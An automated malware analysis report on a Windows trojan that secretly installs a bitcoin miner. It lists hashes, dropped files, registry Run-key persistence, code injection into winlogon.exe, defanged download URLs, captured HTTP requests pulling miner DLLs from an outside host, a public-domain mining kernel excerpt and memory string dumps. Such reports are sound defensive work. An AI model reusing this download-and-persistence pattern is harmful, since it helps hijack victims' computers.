Trojan.GenericKD.1586901_222c557143
Trojan.MSIL.Miner.vt (Kaspersky), Trojan.DownLoader9.4905 (DrWeb), Artemis!222C557143EE (McAfee), Worm.Win32.Gamarue (Ikarus), MSIL:Injector-FY [Trj] (Avast), Trojan.GenericKD.1586901 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Worm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 222c557143ee4f9186c2c62963a23c59
SHA1: d4dc2d4e82c4aaed0b9543180c885babf67ce2e3
SHA256: 4364d1f8a8449c306a11980c81f207a07a41f0dcd0bb0dbb05dfcb2010eca9c7
SSDeep: 1536:XL2DjOKLJb6ePVKBECJrtYlLcQJpmmEcMdpncJxb3o2NbMALI7:SfZJb6GVKBEg84ukmEVdpnYvMV
Size: 74752 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2014-02-12 05:00:29
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:3948
The Trojan injects its code into the following process(es):
bdllsysinc:528
winlogon.exe:2224
File activity
The process bdllsysinc:528 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\zTIcT\phatk.cl (606 bytes)
%Documents and Settings%\%current user%\Application Data\zTIcT\winlogon.exe (196 bytes)
%Documents and Settings%\%current user%\Application Data\zTIcT\miner.dll (4899 bytes)
%Documents and Settings%\%current user%\Application Data\zTIcT\usft_ext.dll (15324 bytes)
%Documents and Settings%\%current user%\Application Data\zTIcT\mpir.dll (8280 bytes)
%Documents and Settings%\%current user%\Application Data\zTIcT\taskengine.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\zTIcT\coinutil.dll (1924 bytes)
%Documents and Settings%\%current user%\Application Data\zTIcT\openssl.dll (10156 bytes)
The process %original file name%.exe:3948 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Microsoft\bdllsysinc (601 bytes)
Registry activity
The process bdllsysinc:528 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 F8 15 B8 69 A5 11 DF 5D F0 1B F9 29 10 39 B7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"sysetyo" = "%Documents and Settings%\%current user%\Application Data\Microsoft\bdllsysinc"
"Default" = "%Documents and Settings%\%current user%\Application Data\zTIcT\taskengine.exe"
The process %original file name%.exe:3948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA 26 D9 EE F1 D3 6E 12 DA 99 44 40 12 CE A3 20"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
Dropped PE files
| MD5 | File path |
|---|---|
| fb2e702245641352e5080376c8b4c0ec | c:\Documents and Settings\"%CurrentUserName%"\Application Data\zTIcT\coinutil.dll |
| 781ab510902b049273e8a7937717717a | c:\Documents and Settings\"%CurrentUserName%"\Application Data\zTIcT\miner.dll |
| c5ef047da98c6cc681e0a73b23fbdc5e | c:\Documents and Settings\"%CurrentUserName%"\Application Data\zTIcT\mpir.dll |
| a3e8313b8422c91a183c569df6723adb | c:\Documents and Settings\"%CurrentUserName%"\Application Data\zTIcT\openssl.dll |
| 16f5ad602489e3a2ebbd843f844a3f3c | c:\Documents and Settings\"%CurrentUserName%"\Application Data\zTIcT\usft_ext.dll |
| d44ec356816b57d7377ddd4153d08856 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\zTIcT\winlogon.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: 9ee731a4
Product Name: 1f72938e
Product Version: 1.0.0.0
Legal Copyright: Copyright (C) 7c7c 2014
Legal Trademarks: d526e0f8
Original Filename: 354ef49cc7.exe
Internal Name: 354ef49cc7.exe
File Version: 1.0.0.0
File Description: 13db888a
Comments: 5172a068
Language: Language Neutral
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 8192 | 71508 | 71680 | 5.18618 | 848ecdab1f0f02a06dc5f6c7fae8ec25 |
| .rsrc | 81920 | 1540 | 2048 | 2.78979 | 5349167494a9e6cff5d6bd8a957d7c4f |
| .reloc | 90112 | 12 | 512 | 0.070639 | d73f3314ca980f9db40ab0b4e44c570f |
URLs
| URL | IP |
|---|---|
| hxxp://insidious.biz/btcfiles/program.exe | |
| hxxp://insidious.biz/btcfiles/miner.dll | |
| hxxp://insidious.biz/btcfiles/phatk.cl | |
| hxxp://insidious.biz/btcfiles/openssl.dll | |
| hxxp://insidious.biz/btcfiles/usft_ext.dll | |
| hxxp://insidious.biz/btcfiles/coinutil.dll | |
| hxxp://insidious.biz/btcfiles/mpir.dll | |
| stratum.bitcoin.cz | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY PE EXE or DLL Windows file download
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
Traffic
GET /btcfiles/program.exe HTTP/1.1
Host: insidious.biz
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Sun, 06 Apr 2014 02:15:44 GMT
Content-Type: application/octet-stream
Content-Length: 17408
Connection: keep-alive
Set-Cookie: __cfduid=dd591da01a3b50236048c3b33653c77111396750544346; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.insidious.biz; HttpOnly
Last-Modified: Sat, 23 Nov 2013 20:12:25 GMT
ETag: "2ee7c2d-4400-4ebddbfcc9c40"
Accept-Ranges: bytes
CF-RAY: 116a7ab624e002b8-IAD
<<< skipped >>>
GET /btcfiles/miner.dll HTTP/1.1
Host: insidious.biz
HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Sun, 06 Apr 2014 02:15:44 GMT
Content-Type: application/octet-stream
Content-Length: 99328
Connection: keep-alive
Set-Cookie: __cfduid=dceed3a4b70781cb0e007282b598a85e71396750544642; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.insidious.biz; HttpOnly
Last-Modified: Sat, 23 Nov 2013 20:12:13 GMT
ETag: "2ee7c29-18400-4ebddbf158140"
Accept-Ranges: bytes
CF-RAY: 116a7ab8051e02b8-IAD
<<< skipped >>>
GET /btcfiles/phatk.cl HTTP/1.1
Host: insidious.biz
HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Sun, 06 Apr 2014 02:15:45 GMT
Content-Type: application/simple-filter+xml
Content-Length: 9385
Connection: keep-alive
Set-Cookie: __cfduid=d80112b72dd11264105364a42ed2d424f1396750545071; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.insidious.biz; HttpOnly
Last-Modified: Fri, 13 Sep 2013 12:11:02 GMT
ETag: "2ee7c2c-24a9-4e642bf816180"
Accept-Ranges: bytes
CF-RAY: 116a7abab56d02b8-IAD

// This file is taken and modified from the public-domain poclbm project, and
// we have therefore decided to keep it public-domain in Phoenix.

// 2011-07-11: further modified by Diapolo and still public-domain

#ifdef __CUDACC__
 typedef unsigned int uint;
 typedef unsigned long ulong;
# define __constant __constant__
# define __kernel __global__
# define __global
# define rotate(x, y) ((x << y) | (x >> (32-y)))
# define get_global_id(y) (threadIdx.x + blockDim.x*blockIdx.x)
# define bitselect(z, y, x) ((x & y) ^ (~x & z))
#endif

#define OUTPUT_SIZE 256
#define OUTPUT_MASK 255

#ifdef VECTORS
 typedef uint2 u;
#else
 typedef uint u;
#endif

__constant uint K[64] = {
 0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5, 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5,
 0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3, 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174,
 0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc, 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da,
 0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7, 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967,
 0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13, 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85,
 0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3, 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070,
 0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5, 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3,
 0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208, 0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2
};

// H[6] = 0x08909ae5U + 0xb0edbdd0 + K[<<< skipped >>>
GET /btcfiles/openssl.dll HTTP/1.1
Host: insidious.biz
HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Sun, 06 Apr 2014 02:15:45 GMT
Content-Type: application/octet-stream
Content-Length: 331264
Connection: keep-alive
Set-Cookie: __cfduid=d357c820b8f0775506d81f4bd6f36286e1396750545294; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.insidious.biz; HttpOnly
Last-Modified: Sat, 23 Nov 2013 20:17:52 GMT
ETag: "2ee7c2b-50e00-4ebddd34a3c00"
Accept-Ranges: bytes
CF-RAY: 116a7abc15ab02b8-IAD
<<< skipped >>>
GET /btcfiles/usft_ext.dll HTTP/1.1
Host: insidious.biz
HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Sun, 06 Apr 2014 02:15:46 GMT
Content-Type: application/octet-stream
Content-Length: 259584
Connection: keep-alive
Set-Cookie: __cfduid=ddbebe7dc3dbad8da7b12cb303b99276e1396750546483; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.insidious.biz; HttpOnly
Last-Modified: Sat, 23 Nov 2013 20:13:47 GMT
ETag: "2ee7c2e-3f600-4ebddc4afd4c0"
Accept-Ranges: bytes
CF-RAY: 116a7ac386cc02b8-IAD
<<< skipped >>>
GET /btcfiles/coinutil.dll HTTP/1.1
Host: insidious.biz
HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Sun, 06 Apr 2014 02:15:47 GMT
Content-Type: application/octet-stream
Content-Length: 22528
Connection: keep-alive
Set-Cookie: __cfduid=d4f436998a56931dccfba7226c19f08481396750547153; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.insidious.biz; HttpOnly
Last-Modified: Sat, 23 Nov 2013 20:11:26 GMT
ETag: "2ee7c27-5800-4ebddbc485780"
Accept-Ranges: bytes
CF-RAY: 116a7ac7b76102b8-IAD
<<< skipped >>>
GET /btcfiles/mpir.dll HTTP/1.1
Host: insidious.biz
HTTP/1.1 200 OK
Server: cloudflare-nginx
Date: Sun, 06 Apr 2014 02:15:47 GMT
Content-Type: application/octet-stream
Content-Length: 69120
Connection: keep-alive
Set-Cookie: __cfduid=d2539de5cabbcd945efbcb56180ccb9201396750547396; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.insidious.biz; HttpOnly
Last-Modified: Sat, 23 Nov 2013 20:18:27 GMT
ETag: "2ee7c2a-10e00-4ebddd5604ac0"
Accept-Ranges: bytes
CF-RAY: 116a7ac937ab02b8-IAD
<<< skipped >>>
winlogon.exe_2224_rwx_00401000_00011000:
http://ufasoft.com/coin
http://127.0.0.1:8332
-x type=host:port Use HTTP or SOCKS proxy. Examples: -x http=127.0.0.1:3128, -x socks=127.0.0.1:1080
{-options}-A user-agent Set custom User-agent string in HTTP header, default: Ufasoft bitcoin miner
-o url in form http://user:[email protected]:port/path, stratum tcp://server.tld:port, by default http://127.0.0.1:8332
C:\OUT\FINAL_OUT\Release\PDB\coin-miner.pdb
coin-miner.exe
?SetLogin@BitcoinMiner@Coin@@UAEXPBD@Z
?SetMainUrl@BitcoinMiner@Coin@@UAEXPBD@Z
?SetPassword@BitcoinMiner@Coin@@UAEXPBD@Z
?SubmitResult@BitcoinMiner@Coin@@UAE_NAAPAVWebClient@Ext@@ABVBitcoinWorkData@2@@Z
?GetWork@BitcoinMiner@Coin@@UAE?AV?$ptr@VBitcoinWorkData@Coin@@VInterlocked@Ext@@@Ext@@AAPAVWebClient@4@@Z
?GetWebClient@BitcoinMiner@Coin@@UAE?AVBitcoinWebClient@2@PAVWorkerThreadBase@2@@Z
.text
`.rdata
@.data
.rsrc
x type=host:portU@HTTP
o urld
winlogon.exe_2224_rwx_11001000_000C5000:
winlogon.exe_2224_rwx_13001000_00025000:
GNU MP assertion failed: %s
GNU MP: Cannot allocate memory (size=%u)
GNU MP: Cannot reallocate memory (old_size=%u new_size=%u)
$%&'()* ,-./0123456789:;<=
DFwV.zu
C:\OUT\FINAL_OUT\Release\PDB\mpir.pdb
MPIR.dll
.text
`.rdata
@.data
.rsrc
@.reloc
winlogon.exe_2224_rwx_13201000_000CC000:
PKEY_DH_KEYGEN
invalid public key
crypto\dh\dh_key.c
Diffie-Hellman part of OpenSSL 1.0.0c 2 Dec 2010
d.other
d.data
d.sign
d.enveloped
d.signed_and_enveloped
d.digest
d.encrypted
cert
key_enc_algor
enc_key
PKCS7_add_certificate
certificate verify error
decrypted key is wrong length
encryption not supported for this key type
no recipient matches certificate
no recipient matches key
operation not supported on this type
private key does not match certificate
signer certificate not found
signing not supported for this key type
unable to find certificate
unknown operation
unsupported cipher type
unsupported content type
keyEncryptionAlgorithm
encryptedKey
CMS_KeyTransRecipientInfo
keyAttrId
keyAttr
CMS_OtherKeyAttribute
subjectKeyIdentifier
CMS_RecipientKeyIdentifier
d.rKeyId
CMS_KeyAgreeRecipientIdentifier
CMS_RecipientEncryptedKey
CMS_OriginatorPublicKey
d.originatorKey
CMS_OriginatorIdentifierOrKey
recipientEncryptedKeys
CMS_KeyAgreeRecipientInfo
keyIdentifier
keyDerivationAlgorithm
CMS_PasswordRecipientInfo
d.ktri
d.kari
d.kekri
d.pwri
d.ori
d.signedData
d.envelopedData
d.digestedData
d.encryptedData
d.authenticatedData
d.compressedData
d.allOrFirstTier
d.receiptList
otherCertFormat
otherCert
CMS_OtherCertificateFormat
d.certificate
d.extendedCertificate
d.v1AttrCert
d.v2AttrCert
CMS_CertificateChoices
d.issuerAndSerialNumber
d.subjectKeyIdentifier
d.crl
certificates
certificate already present
certificate has no keyid
error getting public key
error setting key
invalid encrypted key length
msgsigdigest error
msgsigdigest verification failure
msgsigdigest wrong length
not key transport
not supported for this key type
no key
no key or cert
no msgsigdigest
no private key
no public key
unsupported compression algorithm
unsupported kek algorithm
unsupported recipient type
unsupported recpientinfo type
CMS_add0_cert
CMS_add0_recipient_key
CMS_add1_recipient_cert
CMS_decrypt_set1_key
CMS_decrypt_set1_pkey
CMS_EncryptedData_set1_key
CMS_GET0_CERTIFICATE_CHOICES
cms_msgSigDigest_add1
CMS_RecipientInfo_ktri_cert_cmp
CMS_RecipientInfo_set0_key
CMS_RecipientInfo_set0_pkey
CMS_SIGNERINFO_VERIFY_CERT
Load certs from files in a directory
%s%clx.%s%d
/usr/local/ssl/certs
/usr/local/ssl/cert.pem
SSL_CERT_DIR
SSL_CERT_FILE
ADD_CERT_DIR
GET_CERT_BY_SUBJECT
X509_check_private_key
X509_get_pubkey_parameters
X509_load_cert_crl_file
X509_load_cert_file
X509_PUBKEY_get
X509_PUBKEY_set
X509_REQ_check_private_key
X509_STORE_add_cert
X509_verify_cert
cant check dh key
cert already in hash table
key type mismatch
key values mismatch
loading cert dir
no cert set for us to verify
public key decode error
public key encode error
unable to get certs public key
unknown key type
X.509 part of OpenSSL 1.0.0c 2 Dec 2010
OPENSSL_ALLOW_PROXY_CERTS
ECDSA part of OpenSSL 1.0.0c 2 Dec 2010
SHA1 part of OpenSSL 1.0.0c 2 Dec 2010
SHA-256 part of OpenSSL 1.0.0c 2 Dec 2010
SHA-512 part of OpenSSL 1.0.0c 2 Dec 2010
DlSHA part of OpenSSL 1.0.0c 2 Dec 2010
crypto\x509v3\v3_akey.c
AUTHORITY_KEYID
%d.%d.%d.%d
othername:
X400Name:
EdiPartyName:
email:%s
DNS:%s
URI:%s
IP Address:%d.%d.%d.%d
Key Encipherment
keyEncipherment
Key Agreement
keyAgreement
Certificate Sign
keyCertSign
d.cpsuri
d.usernotice
CERTIFICATEPOLICIES
%*sCPS: %s
%*sOrganization: %s
%*sNumber%s:
%*sExplicit Text: %s
name.fullname
name.relativename
Key Compromise
keyCompromise
Cessation Of Operation
cessationOfOperation
Certificate Hold
certificateHold
%*sOnly User Certificates
%*sOnly CA Certificates
%*sOnly Attribute Certificates
EXTENDED_KEY_USAGE
d.otherName
d.rfc822Name
d.dNSName
d.directoryName
d.ediPartyName
d.uniformResourceIdentifier
d.iPAddress
d.registeredID
%d.%d.%d.%d/%d.%d.%d.%d
%*scrlUrl:
%*sPolicy Text: %s
PROXY_CERT_INFO_EXTENSION
PKEY_USAGE_PERIOD
%s:%s
%*s%s
%*s
crypto\x509v3\v3_skey.c
%*sZone: %s, User:
unable to get issuer keyid
unsupported option
R2I_CERTPOL
S2I_ASN1_SKEY_ID
S2I_SKEY_ID
V2I_AUTHORITY_KEYID
V2I_EXTENDED_KEY_USAGE
extension setting not supported
no issuer certificate
no proxy cert policy language defined
operation not defined
policy syntax not currently supported
ECDH_compute_key
ECDH part of OpenSSL 1.0.0c 2 Dec 2010
value.other
value.x509cert
value.sdsicert
value.keybag
value.shkeybag
value.safes
value.bag
crypto\pkcs12\p12_key.c
PKCS12_add_localkeyid
PKCS12_key_gen_asc
PKCS12_key_gen_uni
PKCS12_MAKE_KEYBAG
PKCS12_MAKE_SHKEYBAG
PKCS12_newpass
PKCS12_PBE_keyivgen
PKCS8_add_keyusage
key gen error
unsupported pkcs12 mode
CONF_def part of OpenSSL 1.0.0c 2 Dec 2010
[%s] %s=%s
[[%s]]
CONF part of OpenSSL 1.0.0c 2 Dec 2010
MD5 part of OpenSSL 1.0.0c 2 Dec 2010
WIN32_JOINER
functionality not supported
CERTIFICATE REQUEST
NEW CERTIFICATE REQUEST
CERTIFICATE
RSA PRIVATE KEY
RSA PUBLIC KEY
DSA PRIVATE KEY
EC PRIVATE KEY
d2i_PKCS8PrivateKey_bio
d2i_PKCS8PrivateKey_fp
DO_PK8PKEY
DO_PK8PKEY_FP
PEM_F_PEM_WRITE_PKCS8PRIVATEKEY
PEM_PK8PKEY
PEM_READ_BIO_PRIVATEKEY
PEM_READ_PRIVATEKEY
PEM_WRITE_PRIVATEKEY
error converting private key
expecting private key blob
expecting public key blob
keyblob header parse error
keyblob too short
problems getting password
public key no rsa
read key
unsupported encryption
unsupported key components
X509 CERTIFICATE
TRUSTED CERTIFICATE
PEM part of OpenSSL 1.0.0c 2 Dec 2010
Enter PEM pass phrase:
phrase is too short, needs to be at least %d chars
ANY PRIVATE KEY
ENCRYPTED PRIVATE KEY
PRIVATE KEY
crypto\pem\pem_pkey.c
crlUrl
issuerKeyHash
OCSP_CERTID
reqCert
value.byName
value.byKey
value.good
value.revoked
value.unknown
OCSP_CERTSTATUS
certId
certStatus
OCSP_cert_id_new
OCSP_parse_url
PARSE_HTTP_LINE1
error parsing url
no certificates in chain
unsupported requestorname type
Verifying - %s
zlib not supported
hash of hash of key mismatch
hash of key mismatch
ESS_ADD_SIGNING_CERT
ESS_CERT_ID_NEW_INIT
ESS_SIGNING_CERT_NEW_INIT
TS_CHECK_SIGNING_CERTS
TS_MSG_IMPRINT_set_algo
TS_REQ_set_msg_imprint
TS_RESP_CTX_set_certs
TS_RESP_CTX_set_signer_cert
TS_TST_INFO_set_msg_imprint
TS_VERIFY_CERT
ess add signing cert error
ess signing certificate error
invalid signer certificate purpose
unsupported md algorithm
unsupported version
MD2 part of OpenSSL 1.0.0c 2 Dec 2010
RC2 part of OpenSSL 1.0.0c 2 Dec 2010
RC4 part of OpenSSL 1.0.0c 2 Dec 2010
IDEA part of OpenSSL 1.0.0c 2 Dec 2010
DES part of OpenSSL 1.0.0c 2 Dec 2010
libdes part of OpenSSL 1.0.0c 2 Dec 2010
Blowfish part of OpenSSL 1.0.0c 2 Dec 2010
:CAST part of OpenSSL 1.0.0c 2 Dec 2010
MD4 part of OpenSSL 1.0.0c 2 Dec 2010
RIPE-MD160 part of OpenSSL 1.0.0c 2 Dec 2010
s->s2->key_material_length <= sizeof s->s2->key_material
c->iv_len <= (int)sizeof(s->session->key_arg)
SSLv2 part of OpenSSL 1.0.0c 2 Dec 2010
s->session->master_key_length >= 0 && s->session->master_key_length < (int)sizeof(s->session->master_key)
SSLv3 part of OpenSSL 1.0.0c 2 Dec 2010
GOST signature length is %d
os.length <= (int)sizeof(ret->session_id)
ssl\ssl_cert.c
%-23s %s Kx=%-8s Au=%-4s Enc=%-9s Mac=%-4s%s
EXPORT
EXPORT40
EXPORT56
public key encrypt error
SSL_SESS_CERT_NEW
public key is not rsa
SSL_SET_CERT
SSL_SET_PKEY
reuse cert length not zero
reuse cert type not zero
SSL_use_certificate
SSL_use_certificate_ASN1
SSL_use_certificate_file
SSL_use_PrivateKey
SSL_use_PrivateKey_ASN1
signature for non signing certificate
SSL_use_PrivateKey_file
SSL_use_RSAPrivateKey
SSL_use_RSAPrivateKey_ASN1
SSL_use_RSAPrivateKey_file
SSL_VERIFY_CERT_CHAIN
tls1_cert_verify_mac
sslv3 alert bad certificate
sslv3 alert certificate expired
sslv3 alert certificate revoked
sslv3 alert certificate unknown
TLS1_SETUP_KEY_BLOCK
sslv3 alert no certificate
sslv3 alert unsupported certificate
tlsv1 alert export restriction
tlsv1 bad certificate hash value
tlsv1 bad certificate status response
tlsv1 certificate unobtainable
tlsv1 unsupported extension
tls client cert req with anon cipher
tls peer did not respond with certificate list
tried to use unsupported cipher
unable to decode dh certs
unable to decode ecdh certs
unable to extract public key
unable to find public key parameters
unknown certificate type
unknown key exchange type
unknown pkey type
unsupported digest type
unsupported elliptic curve
unsupported protocol
unsupported ssl version
unsupported status type
wrong number of key bits
CLIENT_CERTIFICATE
CLIENT_MASTER_KEY
DTLS1_ADD_CERT_TO_BUF
bad dh pub key length
bad ecc cert
DTLS1_OUTPUT_CERT_CHAIN
DTLS1_SEND_CERTIFICATE_REQUEST
DTLS1_SEND_CLIENT_CERTIFICATE
DTLS1_SEND_CLIENT_KEY_EXCHANGE
DTLS1_SEND_SERVER_CERTIFICATE
DTLS1_SEND_SERVER_KEY_EXCHANGE
GET_CLIENT_MASTER_KEY
REQUEST_CERTIFICATE
certificate verify failed
cert length mismatch
SSL2_GENERATE_KEY_MATERIAL
SSL2_SET_CERTIFICATE
SSL3_ADD_CERT_TO_BUF
SSL3_CHECK_CERT_AND_ALGORITHM
ecc cert not for key agreement
ecc cert not for signing
ecc cert should have rsa signature
ecc cert should have sha1 signature
SSL3_GENERATE_KEY_BLOCK
error generating tmp rsa key
SSL3_GET_CERTIFICATE_REQUEST
SSL3_GET_CERT_STATUS
SSL3_GET_CERT_VERIFY
SSL3_GET_CLIENT_CERTIFICATE
https proxy request
SSL3_GET_CLIENT_KEY_EXCHANGE
http request
SSL3_GET_KEY_EXCHANGE
SSL3_GET_SERVER_CERTIFICATE
invalid ticket keys length
key arg too long
SSL3_OUTPUT_CERT_CHAIN
SSL3_SEND_CERTIFICATE_REQUEST
SSL3_SEND_CLIENT_CERTIFICATE
SSL3_SEND_CLIENT_KEY_EXCHANGE
krb5 server rd_req (keytab perms?)
SSL3_SEND_SERVER_CERTIFICATE
SSL3_SEND_SERVER_KEY_EXCHANGE
SSL3_SETUP_KEY_BLOCK
missing dh dsa cert
missing dh key
SSL_add_dir_cert_subjects_to_stack
missing dh rsa cert
SSL_add_file_cert_subjects_to_stack
missing dsa signing cert
missing export tmp dh key
missing export tmp rsa key
missing rsa certificate
missing rsa encrypting cert
SSL_CERT_DUP
missing rsa signing cert
SSL_CERT_INST
missing tmp dh key
SSL_CERT_INSTANTIATE
missing tmp ecdh key
SSL_CERT_NEW
missing tmp rsa key
SSL_check_private_key
missing tmp rsa pkey
SSL_CHECK_SRVR_ECC_CERT_AND_ALG
no certificates returned
no certificate assigned
no certificate returned
no certificate set
no certificate specified
SSL_CTX_check_private_key
no ciphers passed
SSL_CTX_set_client_cert_engine
no client cert method
no client cert received
Peer haven't sent GOST certificate, required for selected ciphersuite
SSL_CTX_use_certificate
SSL_CTX_use_certificate_ASN1
no privatekey
SSL_CTX_use_certificate_chain_file
no private key assigned
SSL_CTX_use_certificate_file
SSL_CTX_use_PrivateKey
no publickey
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_RSAPrivateKey
SSL_CTX_use_RSAPrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey_file
null ssl method passed
SSL_GET_SERVER_SEND_CERT
SSL_GET_SIGN_PKEY
peer did not return a certificate
peer error certificate
peer error no certificate
peer error unsupported certificate type
SSLv2 write client master key A
SSLv2 write client master key B
SSLv2 write client certificate A
SSLv2 write client certificate B
SSLv2 write client certificate C
SSLv2 write client certificate D
SSLv2 read client master key A
SSLv2 read client master key B
SSLv2 write request certificate A
SSLv2 write request certificate B
SSLv2 write request certificate C
SSLv2 write request certificate D
SSLv2 X509 read server certificate
SSLv2 X509 read client certificate
SSLv3 read server certificate A
SSLv3 read server certificate B
SSLv3 read server key exchange A
SSLv3 read server key exchange B
SSLv3 read server certificate request A
SSLv3 read server certificate request B
SSLv3 write client certificate A
SSLv3 write client certificate B
SSLv3 write client certificate C
SSLv3 write client certificate D
SSLv3 write client key exchange A
SSLv3 write client key exchange B
SSLv3 write certificate verify A
SSLv3 write certificate verify B
SSLv3 write certificate A
SSLv3 write certificate B
SSLv3 write key exchange A
SSLv3 write key exchange B
SSLv3 write certificate request A
SSLv3 write certificate request B
SSLv3 read client certificate A
SSLv3 read client certificate B
SSLv3 read client key exchange A
SSLv3 read client key exchange B
SSLv3 read certificate verify A
SSLv3 read certificate verify B
key expansion
client write key
server write key
TLSv1 part of OpenSSL 1.0.0c 2 Dec 2010
IBM_4758_LOAD_PRIVKEY
IBM_4758_LOAD_PUBKEY
IBM 4758 CCA hardware engine support
IBM 4758 CCA RSA key handle
AEP_MOD_EXP_CRT
missing key components
mod exp crt failed
Aep hardware engine support
AEP_ModExpCrt
Atalla hardware engine support
ASI_RSAPrivateKeyOpFn
list_certs
List all certificates in store
lookup_cert
Lookup and output certificates
key_type
Key type: 1=AT_KEYEXCHANGE (default), 2=AT_SIGNATURE
Set list options (1=summary,2=friendly name, 4=full printout, 8=PEM output, 16=XXX, 32=private key info)
Set key lookup method (1=substring, 2=friendlyname, 3=container name)
certificate store name, default "MY"
Certificate store flags: 1 = system store
CAPI_CERT_GET_FNAME
CAPI_GET_KEY
CAPI_GET_PKEY
CAPI_LOAD_PRIVKEY
CERT_SELECT_DIALOG
CLIENT_CERT_SELECT
cant get key
error adding cert
error getting key provider info
function not supported
getuserkey error
invalid dsa public key blob magic number
invalid public key blob
invalid rsa public key blob magic number
pubkey export error
pubkey export length error
unsupported algorithm nid
unsupported padding
unsupported public key algorithm
Setting store name to %s
Setting flags to %d
Setting debug level to %d
Setting debug file to %s
Setting key type to %d
aiKeyAlg=0x
capi_get_provname, index=%d
capi_get_provname, returned name=%s, type=%d
%d. %s, type %d
Listing containers CSP=%s, type = %d
Got max container len %d
Container name %s, len=%d, index=%d, flags=%d
%d. %s
No Private Key
Private Key Info:
Provider Name: %s, Provider Type %d
Container Name: %s, Key Type %d
capi_cert_get_fname
Friendly Name "%s"
Opening certificate store %s
Listing certs for store %s
Certificate %d
capi_get_key, contname=%s, provname=%s, type=%d
capi_ctx_set_provname, name=%s, type=%d
Can't Parse Certificate %d
HWCRHK_GET_PASS
HWCRHK_LOAD_PRIVKEY
HWCRHK_LOAD_PUBKEY
private key algorithms disabled
CHIL hardware engine support
HWCryptoHook_RSALoadKey
HWCryptoHook_RSAGetPublicKey
HWCryptoHook_RSAUnloadKey
HWCryptoHook_ModExpCRT
nFast HWCryptoHook RSA key handle
pass phrase
Current card: "%s"
Insert card "%s"
CSWIFT_MOD_EXP_CRT
bad key size
CryptoSwift hardware engine support
swAttachKeyParam
Nuron hardware engine support
VIA PadLock (%s, %s)
SUREWAREHK_LOAD_PRIVKEY
SUREWAREHK_LOAD_PUBKEY
SureWare hardware engine support
SureWareHook_Load_Privkey
SureWareHook_Info_Pubkey
SureWareHook_Load_Rsa_Pubkey
SureWareHook_Load_Dsa_Pubkey
SureWareHook RSA key handle
SureWareHook DSA key handle
ENGINE_load_privkey
ENGINE_load_pubkey
UBSEC_DH_COMPUTE_KEY
UBSEC_DH_GENERATE_KEY
UBSEC_MOD_EXP_CRT
UBSEC_RSA_MOD_EXP_CRT
UBSEC hardware engine support
rsa_mod_exp_crt_ioctl
ubsec_max_key_len_ioctl
/dev/ubskey
GOST2001_KEYGEN
PKEY_GOST01CP_DECRYPT
PKEY_GOST01CP_ENCRYPT
PKEY_GOST01CP_KEYGEN
